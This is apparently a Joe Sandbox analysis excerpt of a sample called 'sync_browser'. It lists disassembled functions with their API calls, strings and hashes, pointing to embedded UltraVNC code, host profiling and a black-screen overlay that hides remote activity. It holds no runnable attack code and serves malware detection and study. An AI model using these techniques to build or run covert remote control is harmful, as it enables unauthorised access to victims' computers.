Instruction Fuzzy Hash: B4B17521A1C586C5E760AB35A4016B977A0FB057B4F804336EA7E47BE9DF6CF545C320

Function 00007FF740007ACF Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF740007C5B

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740007CC6
sprintf.LIBCMT ref: 00007FF740007D04
sprintf.LIBCMT ref: 00007FF740007D68
GetUserNameA.ADVAPI32 ref: 00007FF740007E9C

Strings

Service Pack: 6a, xrefs: 00007FF740007D5D
v%d., xrefs: 00007FF740007C50
Build:%d, xrefs: 00007FF740007CF9
Current user : , xrefs: 00007FF740007EA6
, (SHX Processor), xrefs: 00007FF740007ADE
%02d, xrefs: 00007FF740007CB3
IP : , xrefs: 00007FF740007FB9
ComputerName : , xrefs: 00007FF740007F2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
API String ID: 171970310-3227166451
Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
Instruction ID: dda9bf59b6eb99828fe7094085dd49f4a5ac5bc9cba70fb7c790399d5062471e
Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
Instruction Fuzzy Hash: B6B17521A1C686C5EB60EB35A4016B977A0FB057B4F804336EA7E47BE9DE6CF545C320

Function 00007FF740007B04 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF740007C5B

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740007CC6
sprintf.LIBCMT ref: 00007FF740007D04
sprintf.LIBCMT ref: 00007FF740007D68
GetUserNameA.ADVAPI32 ref: 00007FF740007E9C

Strings

Service Pack: 6a, xrefs: 00007FF740007D5D
v%d., xrefs: 00007FF740007C50
Build:%d, xrefs: 00007FF740007CF9
Current user : , xrefs: 00007FF740007EA6
%02d, xrefs: 00007FF740007CB3
, (Alpha Processor), xrefs: 00007FF740007B13
IP : , xrefs: 00007FF740007FB9
ComputerName : , xrefs: 00007FF740007F2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
API String ID: 171970310-733379141
Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
Instruction ID: 27418d4f171eeeae204163bdf17db3f54d458d04fd98dc7c5c82ec46f8a37441
Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
Instruction Fuzzy Hash: C1B18521A1C586C5E760EB35A4016B977A0FB057B4F804336E67E87BE9DE2CF505C720

Function 00007FF740007B71 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF740007C5B

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740007CC6
sprintf.LIBCMT ref: 00007FF740007D04
sprintf.LIBCMT ref: 00007FF740007D68
GetUserNameA.ADVAPI32 ref: 00007FF740007E9C

Strings

Service Pack: 6a, xrefs: 00007FF740007D5D
v%d., xrefs: 00007FF740007C50
Build:%d, xrefs: 00007FF740007CF9
Current user : , xrefs: 00007FF740007EA6
, (PPC Processor), xrefs: 00007FF740007B80
%02d, xrefs: 00007FF740007CB3
IP : , xrefs: 00007FF740007FB9
ComputerName : , xrefs: 00007FF740007F2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (PPC Processor)$Current user :
API String ID: 171970310-3099718995
Opcode ID: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
Instruction ID: 01fb95fe52e616e74c61bb49d1ead2d2431addadcc82844c99a969b4a04f98c9
Opcode Fuzzy Hash: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
Instruction Fuzzy Hash: 60B17521A1C586C5EB60AB35A4016B977A0FB057B4F804336EA7E47BE9DF6CF545C320

Function 00007FF740007BE2 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF740007C5B

Part of subcall function 00007FF7400B7C50: _errno.LIBCMT ref: 00007FF7400B7C88
Part of subcall function 00007FF7400B7C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7C93

sprintf.LIBCMT ref: 00007FF740007CC6
sprintf.LIBCMT ref: 00007FF740007D04
sprintf.LIBCMT ref: 00007FF740007D68
GetUserNameA.ADVAPI32 ref: 00007FF740007E9C

Strings

Service Pack: 6a, xrefs: 00007FF740007D5D
v%d., xrefs: 00007FF740007C50
Build:%d, xrefs: 00007FF740007CF9
, (AMD64 Processor), xrefs: 00007FF740007BF1
Current user : , xrefs: 00007FF740007EA6
%02d, xrefs: 00007FF740007CB3
IP : , xrefs: 00007FF740007FB9
ComputerName : , xrefs: 00007FF740007F2C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (AMD64 Processor)$Current user :
API String ID: 171970310-4243357635
Opcode ID: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
Instruction ID: fc5a9432ca0024cbbfa5a056b910e096df697a3790003b5984caec1f1483f53e
Opcode Fuzzy Hash: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
Instruction Fuzzy Hash: F7B18521A1C586C5EB60EB35A4016B977A0FB057B4F804336E67E87BE9DE2CF505C720

Function 00007FF740004200 Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 90threadwindowCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF740004229
GetCurrentThreadId.KERNEL32 ref: 00007FF740004253
GetThreadDesktop.USER32 ref: 00007FF74000425B
GetUserObjectInformationA.USER32 ref: 00007FF74000428A
SetThreadDesktop.USER32 ref: 00007FF7400042D0
GetMessageA.USER32 ref: 00007FF740004301
TranslateMessage.USER32 ref: 00007FF740004315
DispatchMessageA.USER32 ref: 00007FF740004320
GetMessageA.USER32 ref: 00007FF740004333
SetThreadDesktop.USER32 ref: 00007FF740004355
CloseDesktop.USER32 ref: 00007FF740004363

Strings

black_layered.cpp : end BlackWindow , xrefs: 00007FF74000433D
black_layered.cpp : SelectHDESK to %s (%x) from %x, xrefs: 00007FF7400042AE
black_layered.cpp : OpenInputdesktop Error , xrefs: 00007FF74000423B
black_layered.cpp : OpenInputdesktop OK, xrefs: 00007FF740004247
black_layered.cpp : !GetUserObjectInformation , xrefs: 00007FF740004294
black_layered.cpp : SelectHDESK:!SetThreadDesktop , xrefs: 00007FF7400042DA

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$MessageThread$CloseCurrentDispatchInformationInputObjectOpenTranslateUser
String ID: black_layered.cpp : !GetUserObjectInformation $black_layered.cpp : OpenInputdesktop Error $black_layered.cpp : OpenInputdesktop OK$black_layered.cpp : SelectHDESK to %s (%x) from %x$black_layered.cpp : SelectHDESK:!SetThreadDesktop $black_layered.cpp : end BlackWindow
API String ID: 2763862709-1375279643
Opcode ID: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
Instruction ID: b1cf22e9a9e9858106cbaecd12925d68fe2adea6bfa68ae226f61a17bb3e8299
Opcode Fuzzy Hash: 97dc65336ba64628ca373ffe4e0f0f58b485fa95820c520cbe5a523dd1110f8f
Instruction Fuzzy Hash: FD414B60A1CA83D1FB24FB25B8506BAA3A1BF88744FC55032E55E46779DE3CF149C720

Function 00007FF740022CC0 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF740022D28

Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8

Part of subcall function 00007FF7400B7BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF740053771), ref: 00007FF7400B7BFE

GetCurrentProcessId.KERNEL32 ref: 00007FF740022D6C

Part of subcall function 00007FF7400B7BAC: _getptd.LIBCMT ref: 00007FF7400B7BB4

rand.LIBCMT ref: 00007FF740022D90

Part of subcall function 00007FF7400B7BC4: _getptd.LIBCMT ref: 00007FF7400B7BC8

EnterCriticalSection.KERNEL32 ref: 00007FF740022E5E
LeaveCriticalSection.KERNEL32 ref: 00007FF740022E86
malloc.LIBCMT ref: 00007FF740022F54

Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CC8
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CCD

free.LIBCMT ref: 00007FF740023019
free.LIBCMT ref: 00007FF740023042
free.LIBCMT ref: 00007FF740023088

Strings

View-only password authentication, xrefs: 00007FF740022F94
vncclient.cpp : Failed to send challenge to client, xrefs: 00007FF740023050
vncclient.cpp : Failed to receive challenge response from client, xrefs: 00007FF740022ECC
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF740022D0B, 00007FF740022F37
password authentication, xrefs: 00007FF740022DAB

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errnofree$CriticalSectionTime_callnewh_getptdmalloc$AllocCurrentEnterFileHeapLeaveProcessSystemrand
String ID: View-only password authentication$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$password authentication$vncclient.cpp : Failed to receive challenge response from client$vncclient.cpp : Failed to send challenge to client
API String ID: 3991686958-188493154
Opcode ID: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
Instruction ID: c25ad7055bdd84ef675950bbb3d0a393b61e9bc12948191b3e7819df350d33b1
Opcode Fuzzy Hash: 9d379260281130677ec767493c4a79257c318867dcb6e5a486f079a26b47f014
Instruction Fuzzy Hash: 17B1BD32B0C682D5EB04FB75D8502FDA361EB84B58F844636DA1E47BEADE38E505C360

Function 00007FF74001BB80 Relevance: 24.3, APIs: 16, Instructions: 345COMMON

Download Yara Rule

APIs

GetRegionData.GDI32 ref: 00007FF74001BBE4

Part of subcall function 00007FF74000FA00: GetRegionData.GDI32 ref: 00007FF74000FA4F

Part of subcall function 00007FF7400B92A4: malloc.LIBCMT ref: 00007FF7400B92C7

CreateRectRgn.GDI32 ref: 00007FF74001BC88

Part of subcall function 00007FF74000F940: CreateRectRgn.GDI32 ref: 00007FF74000F972
Part of subcall function 00007FF74000F940: CombineRgn.GDI32 ref: 00007FF74000F98A
Part of subcall function 00007FF74000F940: CombineRgn.GDI32 ref: 00007FF74000F99F

SetRectRgn.GDI32 ref: 00007FF74001BCC0
CombineRgn.GDI32 ref: 00007FF74001BCD9
DeleteObject.GDI32 ref: 00007FF74001BCE3
free.LIBCMT ref: 00007FF74001BCED

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

DeleteObject.GDI32 ref: 00007FF74001BCF5
free.LIBCMT ref: 00007FF74001BCFE
CreateRectRgn.GDI32 ref: 00007FF74001BDB3
SetRectRgn.GDI32 ref: 00007FF74001BDEB
CombineRgn.GDI32 ref: 00007FF74001BE01
DeleteObject.GDI32 ref: 00007FF74001BE0B
free.LIBCMT ref: 00007FF74001BE15
DeleteObject.GDI32 ref: 00007FF74001BE1D
free.LIBCMT ref: 00007FF74001BE26
GetRegionData.GDI32 ref: 00007FF74001BE4B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Rect$CombineDeleteObjectfree$CreateDataRegion$ErrorFreeHeapLast_errnomalloc
String ID:
API String ID: 2853843867-0
Opcode ID: 738010315c4fbe66759cf3f0748f0b1c3343dfd492cab0107882c60a7f806e67
Instruction ID: d70c1fd71abf4e27183403b0d9224e0153f8dc042ec4820ebf0bd8026fa47146
Opcode Fuzzy Hash: 738010315c4fbe66759cf3f0748f0b1c3343dfd492cab0107882c60a7f806e67
Instruction Fuzzy Hash: 4BE1C432A1CA91C6EB10FB66E4406BDB7A1FB88B84F845035EE4D57B68DF39E441CB50

Function 00007FF740016930 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 180windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF740016987

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

Part of subcall function 00007FF7400170B0: EnumDisplaySettingsA.USER32 ref: 00007FF7400170F4
Part of subcall function 00007FF7400170B0: LoadLibraryA.KERNEL32 ref: 00007FF740017109
Part of subcall function 00007FF7400170B0: GetProcAddress.KERNEL32 ref: 00007FF74001712D
Part of subcall function 00007FF7400170B0: FreeLibrary.KERNEL32 ref: 00007FF7400171F2

malloc.LIBCMT ref: 00007FF740016996
GetDC.USER32 ref: 00007FF740016A00
GetSystemPaletteEntries.GDI32 ref: 00007FF740016A2A
GetLastError.KERNEL32 ref: 00007FF740016A33
DeleteDC.GDI32 ref: 00007FF740016A64
ReleaseDC.USER32 ref: 00007FF740016A71

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF740016A0B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF740016A39
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7400169A4
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF74001695B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF740016BB2
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7400169F2

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
Instruction ID: 4b84a2f1078d7e769836cec188482daf687d4d8d6a45aa5e22e05d0adb4e4c70
Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
Instruction Fuzzy Hash: 85613962A1C5D2C1E729BB25E8553B9B390EF44344FC4503AEA4E4B7A5EE3DF505C720

Function 00007FF740004390 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 179windowsleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF740004440
CreateThread.KERNEL32 ref: 00007FF7400044B9
CloseHandle.KERNEL32 ref: 00007FF7400044C7
SendMessageA.USER32 ref: 00007FF7400044F7
FindWindowA.USER32 ref: 00007FF74000456D
PostMessageA.USER32 ref: 00007FF740004585
SendMessageA.USER32 ref: 00007FF7400045AD
mouse_event.USER32 ref: 00007FF7400045C5
Sleep.KERNEL32 ref: 00007FF7400045D0
mouse_event.USER32 ref: 00007FF7400045E7
FindWindowA.USER32 ref: 00007FF7400045F6
PostMessageA.USER32 ref: 00007FF74000460E

Strings

blackscreen, xrefs: 00007FF740004564, 00007FF7400045ED

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

